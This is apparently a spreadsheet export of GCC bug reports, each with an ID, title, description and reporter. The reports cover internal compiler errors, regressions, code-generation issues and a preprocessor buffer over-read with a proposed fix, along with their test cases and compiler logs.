/home/chfang/cpu2006/bin/specinvoke -E -d /home/chfang/cpu2006/benchspec/CPU2006/465.tonto/run/run_base_test_cfang.0000 -c 1 -e compare.err -o compare.stdout -f compare.cmd
*** Miscompare of stdout for details see
    /home/chfang/cpu2006/benchspec/CPU2006/465.tonto/run/run_base_test_cfang.0000/stdout.mis
Error: 1x465.tonto</t>
  </si>
  <si>
    <t>changpeng.fang</t>
  </si>
  <si>
    <t>GCC-52247</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE with asm goto</t>
  </si>
  <si>
    <t>// { dg-do compile }
template 
bool
bar ()
{
  __asm goto ( : : : : lab)
  return true
lab:
  return false
}
bool
foo ()
{
  return bar ()
}
ICEs because pt.c doesn't adjust the LABEL_DECL properly.</t>
  </si>
  <si>
    <t>GCC-1593</t>
  </si>
  <si>
    <t>Internal compiler error using -gdwarf or -gdwarf-2 option</t>
  </si>
  <si>
    <t>Compilation of the attached file with -gdwarf or
-gdwarf-2 option makes the compiler end
with an Internal Compiler Error.
gcc -v -c -gdwarf-2 Env.C -o Env.o
Reading specs from /local/lib/gcc-lib/sparc-sun-solaris2.8/2.95.2/specs
gcc version 2.95.2 19991024 (release)
 /local/lib/gcc-lib/sparc-sun-solaris2.8/2.95.2/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__sparc -D__sun -D__unix -Asystem(unix) -Asystem(svr4) -D__EXCEPTIONS -gdwarf-2 -D__GCC_NEW_VARARGS__ -Acpu(sparc) -Amachine(sparc) Env.C /var/tmp/cccvmmka.ii
GNU CPP version 2.95.2 19991024 (release) (sparc)
#include ... search starts here:
#include  search starts here:
 /local/lib/gcc-lib/sparc-sun-solaris2.8/2.95.2/../../../../include/g++-3
 /usr/local/include
 /local/lib/gcc-lib/sparc-sun-solaris2.8/2.95.2/../../../../sparc-sun-solaris2.8/include
 /local/lib/gcc-lib/sparc-sun-solaris2.8/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /local/lib/gcc-lib/sparc-sun-solaris2.8/2.95.2/cc1plus /var/tmp/cccvmmka.ii -quiet -dumpbase Env.cc -gdwarf-2 -version -o /var/tmp/ccUHlxxa.s
GNU C++ version 2.95.2 19991024 (release) (sparc-sun-solaris2.8) compiled by GNU C version 2.95.2 19991024 (release).
/local/lib/gcc-lib/sparc-sun-solaris2.8/2.95.2/../../../../include/g++-3/stl_relops.h: In function `bool operator !=(const main()::{anonymous enum} &amp; const main()::{anonymous enum} &amp;)':
Env.C:22:   instantiated from here
/local/lib/gcc-lib/sparc-sun-solaris2.8/2.95.2/../../../../include/g++-3/stl_relops.h:38: Internal compiler error in `scope_die_for' at dwarf2out.c:7794
Please submit a full bug report.
See  for instructions.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
sparc-sun-solaris2.8
How-To-Repeat:
/* Env.C */
#include 
#include 
main()
{
   enum { BOL COMMENT VARB VALE} state = BOL
   if (state != BOL) {
      return false
   }
   return true
}
gcc -c -v -save-temps -gdwarf-2 Env.C -o Env.o</t>
  </si>
  <si>
    <t>bruno.zoppis</t>
  </si>
  <si>
    <t>GCC-66030</t>
  </si>
  <si>
    <t>[5.1.0] std::codecvt_byname missing from libstdc++ DLL</t>
  </si>
  <si>
    <t>Created attachment 35470
testcase
Compiling the attached simple test case fails linking for mingw32 because libstdc++ DLL misses codecvt_byname symbols. This test case works with mingw32 gcc 4.9.2.
$ i686-w64-mingw32-g++ -o x.exe x.c 
/tmp/ccIXAXf0.o:x.c:(.text+0x74): undefined reference to `std::codecvt_byname::codecvt_byname(char const* unsigned int)'
collect2: error: ld returned 1 exit status
$ i686-w64-mingw32-gcc -v
Using built-in specs.
COLLECT_GCC=i686-w64-mingw32-gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/i686-w64-mingw32/5.1.0/lto-wrapper
Target: i686-w64-mingw32
Configured with: ../configure --prefix=/usr --bindir=/usr/bin --includedir=/usr/include --mandir=/usr/share/man --infodir=/usr/share/info --datadir=/usr/share --build=x86_64-redhat-linux-gnu --host=x86_64-redhat-linux-gnu --with-gnu-as --with-gnu-ld --verbose --without-newlib --disable-multilib --disable-plugin --with-system-zlib --disable-nls --without-included-gettext --disable-win32-registry --enable-languages=cc++objcobj-c++fortran --with-bugurl=http://bugzilla.redhat.com/bugzilla --with-cloog --enable-threads=posix --enable-libgomp --target=i686-w64-mingw32 --with-sysroot=/usr/i686-w64-mingw32/sys-root --with-gxx-include-dir=/usr/i686-w64-mingw32/sys-root/mingw/include/c++
Thread model: posix
gcc version 5.1.0 20150422 (Fedora MinGW 5.1.0-1.fc23) (GCC)</t>
  </si>
  <si>
    <t>sailer</t>
  </si>
  <si>
    <t>GCC-36292</t>
  </si>
  <si>
    <t>[4.4 Regression]: Many failures in gcc.dg/pch/</t>
  </si>
  <si>
    <t>Revision 135708 has many failures in gcc.dg/pch/ on Linux/ia32:
FAIL: gcc.dg/pch/counter-2.c -O0 -g
FAIL: gcc.dg/pch/counter-2.c  -O0 
FAIL: gcc.dg/pch/counter-2.c  -O1 
FAIL: gcc.dg/pch/counter-2.c  -O2 
FAIL: gcc.dg/pch/counter-2.c  -O3 -fomit-frame-pointer 
FAIL: gcc.dg/pch/counter-2.c  -O3 -g 
FAIL: gcc.dg/pch/counter-2.c  -Os 
FAIL: gcc.dg/pch/valid-1.c -O0 -g
FAIL: gcc.dg/pch/valid-1.c  -O0 
FAIL: gcc.dg/pch/valid-1.c  -O1 
FAIL: gcc.dg/pch/valid-1.c  -O2 
FAIL: gcc.dg/pch/valid-1.c  -O3 -fomit-frame-pointer 
FAIL: gcc.dg/pch/valid-1.c  -O3 -g 
FAIL: gcc.dg/pch/valid-1.c  -Os 
FAIL: gcc.dg/pch/valid-2.c -O0 -g
FAIL: gcc.dg/pch/valid-2.c  -O0 
FAIL: gcc.dg/pch/valid-2.c  -O1 
FAIL: gcc.dg/pch/valid-2.c  -O2 
FAIL: gcc.dg/pch/valid-2.c  -O3 -fomit-frame-pointer 
FAIL: gcc.dg/pch/valid-2.c  -O3 -g 
FAIL: gcc.dg/pch/valid-2.c  -Os 
FAIL: gcc.dg/pch/valid-3.c -O0 -g
FAIL: gcc.dg/pch/valid-3.c  -O0 
FAIL: gcc.dg/pch/valid-3.c  -O1 
FAIL: gcc.dg/pch/valid-3.c  -O2 
FAIL: gcc.dg/pch/valid-3.c  -O3 -fomit-frame-pointer 
FAIL: gcc.dg/pch/valid-3.c  -O3 -g 
FAIL: gcc.dg/pch/valid-3.c  -Os 
FAIL: gcc.dg/pch/warn-1.c -O0 -g
FAIL: gcc.dg/pch/warn-1.c  -O0 
FAIL: gcc.dg/pch/warn-1.c  -O1 
FAIL: gcc.dg/pch/warn-1.c  -O2 
FAIL: gcc.dg/pch/warn-1.c  -O3 -fomit-frame-pointer 
FAIL: gcc.dg/pch/warn-1.c  -O3 -g 
FAIL: gcc.dg/pch/warn-1.c  -Os 
Revision 135705 is OK. Revision 135708:
http://gcc.gnu.org/ml/gcc-cvs/2008-05/msg00870.html
may be the cause.</t>
  </si>
  <si>
    <t>GCC-57819</t>
  </si>
  <si>
    <t>Suboptimal shift patterns</t>
  </si>
  <si>
    <t>Following sample-code demonstrates that patterns for i386 architecture's md for bt* optimizations are weak.  In patterns is just handled that left-hand side mode and righ-hand-side mode are equal (DI/SI).  As right-hand operand of a shift can be 8-bit 16 32 etc bit wide simple cast pessimize optimization.
The sample here is for 64-bit.
/* { dg-do compile } */
/* { dg-options -O2 -mtune=core2 } */
void foo (void)
__extension__ typedef __INTPTR_TYPE__ intptr_t
int test (intptr_t x intptr_t n)
{
  n 
  if (x &amp; ((intptr_t)0x01 &lt;&lt; n))
    foo ()
  return 0
}
int test2 (intptr_t x intptr_t n)
{
  if (x &amp; ((intptr_t)0x01 &lt;&lt; ((int) n &amp; ((sizeof (intptr_t) * 8) - 1))))
    foo ()
  return 0
}
/* { dg-final { scan-assembler-not and\[lq\]\[ \t\] } } */
It procudes following assembly output:
test:
	subq	$40 %rsp
	.seh_stackalloc	40
	.seh_endprologue
	btq	%rdx %rcx
	jnc	.L2
	call	foo
.L2:
	xorl	%eax %eax
	addq	$40 %rsp
	ret
As proper optimized variant and
test2:
	subq	$40 %rsp
	movq	%rcx %rax
	movl	%edx %ecx
	sarq	%cl %rax
	testb	$1 %al
	je	.L8
	call	foo
.L8:
	xorl	%eax %eax
	addq	$40 %rsp
	ret</t>
  </si>
  <si>
    <t>GCC-14461</t>
  </si>
  <si>
    <t>preprocessor cause buffer overflow</t>
  </si>
  <si>
    <t>Preprocessor allocate buffer using mmap() or malloc() for reading include files
at cppfiles.c / read_include_file().
When using malloc() the buffer can be NUL-terminated.
But using mmap() the buffer cannot be NUL-terminated.
Almost implementation of mmap() are NUL-terminated after the mmap()ed file data.
But XFS(SGI's file system) on Linux is different.
So everywhere reading buffer like 'buffer-&gt;cur++' must check buffer overflow.
For example at cpplex.c / _cpp_lex_direct()
&gt; skipped_white:
+  if( buffer-&gt;cur &gt; buffer-&gt;rlimit )
+    c = '\0'
+  else
&gt;  c = *buffer-&gt;cur++
&gt;  result-&gt;col = CPP_BUF_COLUMN (buffer buffer-&gt;cur)</t>
  </si>
  <si>
    <t>kutara</t>
  </si>
  <si>
    <t>GCC-57603</t>
  </si>
  <si>
    <t>Bootstrap fail on s390x segfault in fold_marked_statements</t>
  </si>
  <si>
    <t>Created attachment 30300
delta minimized testcase
cc1 -fpreprocessed -quiet -march=z9-109  -O1 t.c
Program received signal SIGSEGV Segmentation fault.
0x00000000805c3b22 in fold_marked_statements(int pointer_set_t*) ()
(gdb) bt
#0  0x00000000805c3b22 in fold_marked_statements(int pointer_set_t*) ()
#1  0x00000000805d258c in optimize_inline_calls(tree_node*) ()
#2  0x0000000080900c82 in inline_transform(cgraph_node*) ()
#3  0x00000000804b7b86 in execute_all_ipa_transforms() ()
#4  0x0000000080234da6 in expand_function(cgraph_node*) ()
#5  0x0000000080236e68 in compile() ()
#6  0x0000000080237460 in finalize_compilation_unit() ()
#7  0x00000000800f3740 in c_write_global_declarations() ()
#8  0x0000000080568694 in compile_file() ()
#9  0x000000008056a84c in toplev_main(int char**) ()
#10 0x000003fffdc99088 in __libc_start_main (main=0x800d53ac  argc= 
    ubp_av=0x3fffffff258 init= fini=0x809ee1f8  
    rtld_fini=0x3fffdfed8f4  stack_end=0x3fffffff1a0) at libc-start.c:226
#11 0x00000000800d5412 in _start ()</t>
  </si>
  <si>
    <t>GCC-45875</t>
  </si>
  <si>
    <t>[4.6 Regression] ice in gimple_fold_obj_type_ref_known_binfo with -O2</t>
  </si>
  <si>
    <t>I just tried to compile package ddd-3.3.12 with the latest 4.6 snapshot
20101002 on a Fedora Linux box. The compiler said
settings.C: At global scope:
settings.C:4009:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
valgrind said
==2738== Invalid read of size 2
==2738==    at 0xD04E9D: gimple_fold_obj_type_ref_known_binfo (gimple-fold.c:144
4)
==2738==    by 0xB190D1: propagate_info_to_inlined_callees (ipa-prop.c:1527)
==2738==    by 0xB13CA5: cgraph_decide_inlining (ipa-inline.c:1248)
==2738==    by 0x87040E: execute_one_pass (passes.c:1569)
==2738==    by 0x870AE9: execute_ipa_pass_list (passes.c:1936)
==2738==    by 0xB09A87: cgraph_optimize (cgraphunit.c:1733)
==2738==    by 0xB09CC9: cgraph_finalize_compilation_unit (cgraphunit.c:1020)
==2738==    by 0x54F55C: cp_write_global_declarations (decl2.c:3928)
==2738==    by 0x91041B: toplev_main (toplev.c:951)
==2738==    by 0x325FC1EC5C: (below main) (in /lib64/libc-2.12.so)
==2738==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==2738== 
Preprocessed source code attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-6470</t>
  </si>
  <si>
    <t>Re: sparc-sun-solaris2.7 gcc-3.1 libjava testsuite failure in Throw_2</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt;&gt;&gt;&gt;&gt; Kaveh == Kaveh R Ghazi  writes:
 Kaveh&gt; Program received signal SIGSEGV Segmentation fault.
 Kaveh&gt; 0xff041f90 in GC_find_limit (p=0xffbef684  up=1) at ../../../egcc-3.1-CVS20020424/boehm-gc/os_dep.c:642
 This SEGV is normal.  It is ordinarily caught by the GC during
 startup.  So this isn't the actual failure you're seeing.  Instead
 run the program and cont when you hit this SEGV.  That will let you
 find the real problem.
 Tom
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-83523</t>
  </si>
  <si>
    <t>[6 Regression] ICE: verify_gimple failed (error: statement marked for throw but doesn't)</t>
  </si>
  <si>
    <t>gcc-8.0.0-alpha20171217 snapshot (r255766) ICEs when compiling the following snippet w/ -O2 (-Os -O3 -Ofast) -fexceptions -fnon-call-exceptions -ftrapv for 32-bit BE powerpc targets:
void
d4 (long long int fs int rp)
{
  int *h0
    {
      int **yf = 
      int ***wo = 
      fs = 2
      fs *= rp
      *h0 = 0
    }
}
% powerpc-e300c3-linux-gnu-gcc-8.0.0-alpha20171217 -O2 -fhandle-exceptions -fnon-call-exceptions -ftrapv -c xvzxasob.c
xvzxasob.c: In function 'd4':
xvzxasob.c:2:1: error: statement marked for throw but doesn't
 d4 (long long int fs int rp)
 ^~
_6 = rp_5(D) w* 2
during GIMPLE pass: widening_mul
xvzxasob.c:2:1: internal compiler error: verify_gimple failed
0xc8ce84 verify_gimple_in_cfg(function* bool)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/tree-cfg.c:5537
0xb280b1 execute_function_todo
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/passes.c:1994
0xb28efc execute_todo
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20171217/work/gcc-8-20171217/gcc/passes.c:2048</t>
  </si>
  <si>
    <t>GCC-5100</t>
  </si>
  <si>
    <t>Wrong register class selected by find_valid_class</t>
  </si>
  <si>
    <t>We are devoloping a porting of gcc to a new DSP architecture
that has pointers whith a size of 2 registers.
A pointer must always be allocated on a even/odd pair
of registers.
HARD_REGNO_MODE_OK macro returns 0 for all the odd
registers when the mode is Pmode.
There are classes for even registers (EVEN_REGS) odd
registers (ODD_REGS) and all the general registers
(GENERAL_REGS).
The algorithm used by find_valid_class rejects
GENERAL_REGS class for a Pmode subreg and returns
EVEN_REGS.
This is incorrect because a double-sized mode can not
be allocated in EVEN_REGS class.
Release:
3.0
Environment:
Linux 7.0.</t>
  </si>
  <si>
    <t>GCC-78656</t>
  </si>
  <si>
    <t>Fix-it suggestion for std::alocator doesn't include std::allocator</t>
  </si>
  <si>
    <t>This typo for std::allocator gets a poor suggestion:
#include 
void* allocate(std::size_t n) { return std::allocate().allocate(n) }
bad-fixit.cc: In function â€˜void* allocate(std::size_t)â€™:
bad-fixit.cc:3:40: error: â€˜allocateâ€™ is not a member of â€˜stdâ€™
 void* allocate(std::size_t n) { return std::allocate().allocate(n) }
                                        ^~~
bad-fixit.cc:3:40: note: suggested alternative:
bad-fixit.cc:3:7: note:   â€˜allocateâ€™
 void* allocate(std::size_t n) { return std::allocate().allocate(n) }
       ^~~~~~~~
bad-fixit.cc:3:54: error: expected primary-expression before â€˜charâ€™
 void* allocate(std::size_t n) { return std::allocate().allocate(n) }
                                                      ^~~~
bad-fixit.cc:3:54: error: expected â€˜â€™ before â€˜charâ€™
bad-fixit.cc:3:58: error: expected unqualified-id before â€˜&gt;â€™ token
 void* allocate(std::size_t n) { return std::allocate().allocate(n) }
                                                          ^
Even std::allocato or std::allocator or std::alocator doesn't get a good suggestion it still suggests changing std to allocate (which would give allocate::allocate)
It seems that qualification with namespaces isn't really supported properly.</t>
  </si>
  <si>
    <t>GCC-56716</t>
  </si>
  <si>
    <t>during gcc 4.8.0 build on Cygwin:  bid128_fma.c:4460:1: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>Created attachment 29715
pre-processed file bid128_fma.i
While building gcc 4.8.0 on Cygwin [CYGWIN_NT-6.1-WOW64 1.7.17(0.262/5/3)] the compile stops with
../../../libgcc/config/libbid/bid128_fma.c:4460:1: internal compiler error: Segmentation fault
prompt% /usr/tmp/gcc-4.8.0/objdir/./gcc/xgcc -v
Using built-in specs.
COLLECT_GCC=/usr/tmp/gcc-4.8.0/objdir/./gcc/xgcc
Target: i686-pc-cygwin
Configured with: ../configure --prefix=/usr/local/gcc/480/ --enable-version-specific-runtime-libs
Thread model: single
gcc version 4.8.0 (GCC)
make[4]: Leaving directory `/usr/tmp/gcc-4.8.0/objdir/i686-pc-cygwin/libgcc'
/usr/tmp/gcc-4.8.0/objdir/./gcc/xgcc -B/usr/tmp/gcc-4.8.0/objdir/./gcc/ -B/usr/local/gcc/480/i686-pc-cygwin/bin/ -B/usr/local/gcc/480/i686-pc-cygwin/lib/ -isystem /usr/local/gcc/480/i686-pc-cygwin/include -isystem /usr/local/gcc/480/i686-pc-cygwin/sys-include    -g -O2 -O2 -I../../../libgcc/../winsup/w32api/include -I../../../libgcc/../winsup/include  -I../../../libgcc/../winsup/cygwin/include -g -O2 -DIN_GCC   -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include    -g -DIN_LIBGCC2  -fbuilding-libgcc -fno-stack-protector     -I. -I. -I../.././gcc  -I../../../libgcc -I../../../libgcc/. -I../../../libgcc/../gcc  -I../../../libgcc/../include -I../../../libgcc/config/libbid -DENABLE_DECIMAL_BID_FORMAT -DHAVE_CC_TLS -DUSE_EMUTLS -o bid_from_int.o -MT bid_from_int.o -MD -MP -MF bid_from_int.dep -c ../../../libgcc/config/libbid/bid_from_int.c
../../../libgcc/config/libbid/bid128_fma.c:4460:1: internal compiler error: Segmentation fault
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>pen7cmc</t>
  </si>
  <si>
    <t>GCC-81289</t>
  </si>
  <si>
    <t>[8 Regression] ICE in libcpp/line-map.c</t>
  </si>
  <si>
    <t>gcc-8.0.0-alpha20170625 snapshot ICEs most of the time in one of the following ways when compiling this snippet:
--------8&lt;--------
ke ()
{
  mm == *&amp;&amp;
--------&gt;8--------
ICE 1:
% powerpc-e300c3-linux-gnu-gcc-8.0.0-alpha20170625 -w pnr6edbg.c
pnr6edbg.c: In function 'ke':
pnr6edbg.c:3:3: error: 'mm' undeclared (first use in this function)
   mm == *&amp;&amp;
   ^~
pnr6edbg.c:3:3: note: each undeclared identifier is reported only once for each function it appears in
pnr6edbg.c:3:3: error: expected identifier at end of input
pnr6edbg.c:3:3: internal compiler error: Segmentation fault
0xc5e1f9 crash_signal
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/toplev.c:338
0x14e4064 get_range_from_adhoc_loc
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/libcpp/line-map.c:276
0x14e4064 get_range_from_loc(line_maps* unsigned int)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/libcpp/line-map.c:287
0x14beffb get_finish
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/input.h:107
0x14beffb make_location(unsigned int unsigned int unsigned int)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/input.c:859
0x637cb4 c_parser_unary_expression
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:7014
0x638d87 c_parser_cast_expression
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:6927
0x63960e c_parser_binary_expression
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:6857
0x63a1b7 c_parser_conditional_expression
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:6475
0x63a9b5 c_parser_expr_no_commas
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:6392
0x63ac6d c_parser_expression
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:8623
0x63d363 c_parser_expression_conv
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:8656
0x6506c8 c_parser_statement_after_labels
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:5410
0x6521c4 c_parser_compound_statement_nostart
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:4924
0x65275e c_parser_compound_statement
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:4757
0x64e29a c_parser_declaration_or_fndef
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:2125
0x655dd6 c_parser_external_declaration
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:1469
0x6567f1 c_parser_translation_unit
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:1349
0x6567f1 c_parse_file()
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:18131
0x6bda82 c_common_parse_file()
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c-family/c-opts.c:1104
ICE 2:
% powerpc-e300c3-linux-gnu-gcc-8.0.0-alpha20170625 -O2 -w pnr6edbg.c
pnr6edbg.c: In function 'ke':
pnr6edbg.c:3:3: error: 'mm' undeclared (first use in this function)
   mm == *&amp;&amp;
   ^~
pnr6edbg.c:3:3: note: each undeclared identifier is reported only once for each function it appears in
pnr6edbg.c:3:3: error: expected identifier at end of input
pnr6edbg.c:3:3: internal compiler error: in linemap_macro_map_lookup at libcpp/line-map.c:1013
0x14e3f6d linemap_macro_map_lookup
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/libcpp/line-map.c:1013
0x14e3f6d linemap_lookup(line_maps* unsigned int)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/libcpp/line-map.c:947
0x14e3ffc get_range_from_loc(line_maps* unsigned int)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/libcpp/line-map.c:294
0x14beffb get_finish
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/input.h:107
0x14beffb make_location(unsigned int unsigned int unsigned int)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/input.c:859
0x637cb4 c_parser_unary_expression
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:7014
0x638d87 c_parser_cast_expression
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:6927
0x63960e c_parser_binary_expression
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:6857
0x63a1b7 c_parser_conditional_expression
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:6475
0x63a9b5 c_parser_expr_no_commas
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:6392
0x63ac6d c_parser_expression
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:8623
0x63d363 c_parser_expression_conv
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:8656
0x6506c8 c_parser_statement_after_labels
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:5410
0x6521c4 c_parser_compound_statement_nostart
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:4924
0x65275e c_parser_compound_statement
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:4757
0x64e29a c_parser_declaration_or_fndef
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:2125
0x655dd6 c_parser_external_declaration
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:1469
0x6567f1 c_parser_translation_unit
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:1349
0x6567f1 c_parse_file()
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c/c-parser.c:18131
0x6bda82 c_common_parse_file()
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-8.0.0_alpha20170625/work/gcc-8-20170625/gcc/c-family/c-opts.c:1104</t>
  </si>
  <si>
    <t>GCC-32552</t>
  </si>
  <si>
    <t>[4.3 Regression] Runtime failure in SPEC CPU2000 benchmark fma3d and applu</t>
  </si>
  <si>
    <t>SPEC CPU2000 applu and fma3d fail at runtime when compiled with -O3.</t>
  </si>
  <si>
    <t>GCC-54974</t>
  </si>
  <si>
    <t>[4.7 Regression] [ARM] [thumb] Incorrect placement of constant pools</t>
  </si>
  <si>
    <t>Created attachment 28483
Test case
If the following conditions are true a constant pool is placed too far from an LDR instruction accessing it:
- Compiling to Thumb2.
- There is no unconditional branch within 4k of the LDR instruction.
- At least one of:
  * The LDR instruction is not at a 4-byte aligned address.
  * There is an instruction boundary 4094 bytes from the value of PC
    at the LDR.
The problem here is twofold:
1. The base address of a PC-relative LDR in Thumb2 is the address of the
   instruction plus 4 rounded down to a multiple of 4.  The calculation
   for the valid range fails to take this rounding into account.
2. The constant pool is (rightly) 4-byte aligned.  When scanning the
   instructions for a suitable location the possible need for padding
   is not considered.
The problem can be seen by compiling the attached preprocessed source using flags -mthumb -march=armv7-a -mfpu=vfpv3-d16 -mfloat-abi=hard -O0 -fPIC.</t>
  </si>
  <si>
    <t>GCC-17832</t>
  </si>
  <si>
    <t>[4.0 Regression] Bootstrap broken by fixincludes failures</t>
  </si>
  <si>
    <t>Due to recent reorganization fixincludes is now built unconditionally. 
Previously it was not built for machines that did not need it including
Windows.  Since fixincludes does not (and has never) built on native Windows
this breaks bootstrap for these hosts.</t>
  </si>
  <si>
    <t>GCC-46734</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in create_tmp_var at gimplify.c:505</t>
  </si>
  <si>
    <t>Created attachment 22585
segmentAnchorPluckerFeature.i.bz2
Unfortunately the preprocessed source is from boost and huge.  I'm trying to reduce it.  Both 4.5.1 and current 4.5 branch svn fail.  4.4.5 works.
$ g++ -O2 -m32 -c segmentAnchorPluckerFeature.i
In file included from /mnt/data/LAAS/Libs/jafar/modules/jmath/include/jmath/ublasExtra.hpp:12:0
                 from /mnt/data/LAAS/Libs/jafar/modules/slam/src/segmentAnchorPluckerFeature.cpp:6:
/usr/include/boost/numeric/ublas/vector_proxy.hpp: In function 'boost::numeric::ublas::vector_range boost::numeric::ublas::vector_range::project(const boost::numeric::ublas::vector_range::range_type&amp;) const [with V = boost::numeric::ublas::vector boost::numeric::ublas::vector_range::range_type = boost::numeric::ublas::basic_range typename A::difference_type = int typename A::size_type = unsigned int]':
/usr/include/boost/numeric/ublas/vector_proxy.hpp:62:58: internal compiler error: in create_tmp_var at gimplify.c:505
$ g++ -v
Using built-in specs.
COLLECT_GCC=/usr/x86_64-unknown-linux-gnu/gcc-bin/4.5.2-pre9999/g++
